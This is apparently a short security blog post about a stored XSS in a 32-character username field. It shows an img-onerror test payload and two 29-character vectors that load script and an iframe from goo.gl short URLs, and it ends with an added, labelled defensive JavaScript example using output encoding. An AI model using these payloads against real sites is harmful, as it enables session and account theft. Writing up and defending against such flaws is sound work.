A well-known website had a limit of 32 chars on the user name field that was reflected in the public profile area.
That field allowed XSS exploitation:
[code lang="html"]
d<img src=x onerror=prompt(1)>
[/code]
Simple, right?
But sometimes you need to provide a better vector, one where the affected company can see more than a prompt with a number. They also know that their text field is limited to 32 chars.
I found two methods using SCRIPT and IFRAME.
When I was trying this with a tiny URL [is.gd] pointing to my XSS code at davidsopas.com, I realized that the vector wasn't executing.
Why? It required HTTPS: a protocol-relative `//` URL inherits the scheme of the page it is loaded from, and is.gd did not offer HTTPS.
I searched for a tiny URL service that provided HTTPS, and Google provided me with one: goo.gl.
So my final vector was:
[code lang="html"]
<script src=//goo.gl/TJnzmV>
<iframe src=//goo.gl/xWYG4f>
[/code]
29 chars, and I could use any JavaScript I wanted.
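The defender's side of the same field, as an added example that is not part of the original post: a 32-char limit admits every vector shown above, while HTML-encoding the name at the point where it is reflected into the profile page makes the browser render it as text. Function names (`htmlEncode`, `renderProfileName`, `assessAll`) and the sample inputs are my own constructions for this illustration.

```javascript
// Added example, not from the original post: the defender's side of the same
// field. A 32-character limit admits every payload shown above; HTML-encoding
// the name when it is reflected into the profile page is what actually stops them.

const MAX_NAME_LEN = 32; // the field limit the post describes

// Constructed test inputs: the vectors quoted in the post plus a benign name.
const SAMPLE_NAMES = [
  'd<img src=x onerror=prompt(1)>',
  '<script src=//goo.gl/TJnzmV>',
  '<iframe src=//goo.gl/xWYG4f>',
  'Plain Name',
];

// The site's only control: reject names longer than the field allows.
function withinLengthLimit(name) {
  return name.length <= MAX_NAME_LEN;
}

// Encode the characters that are significant in an HTML text context, so the
// browser renders the name as literal text instead of parsing it as markup.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
};
function htmlEncode(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Safe rendering of the profile fragment: encode on output, every time.
function renderProfileName(name) {
  return `<span class="profile-name">${htmlEncode(name)}</span>`;
}

// True when the encoded name still contains a raw '<' or '>', i.e. when the
// browser could treat part of it as a tag. Used here to make the point testable.
function encodedNameHasTagChars(name) {
  return /[<>]/.test(htmlEncode(name));
}

// Summary per sample: passes the length check? still markup after encoding?
function assessAll(names = SAMPLE_NAMES) {
  return names.map((name) => ({
    name,
    withinLimit: withinLengthLimit(name),
    markupAfterEncoding: encodedNameHasTagChars(name),
  }));
}
```

Every sample passes the length check, and none survives encoding as markup, which is the difference between a field constraint and an output-encoding control.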
It was fun!
You guys have any other method you like to share?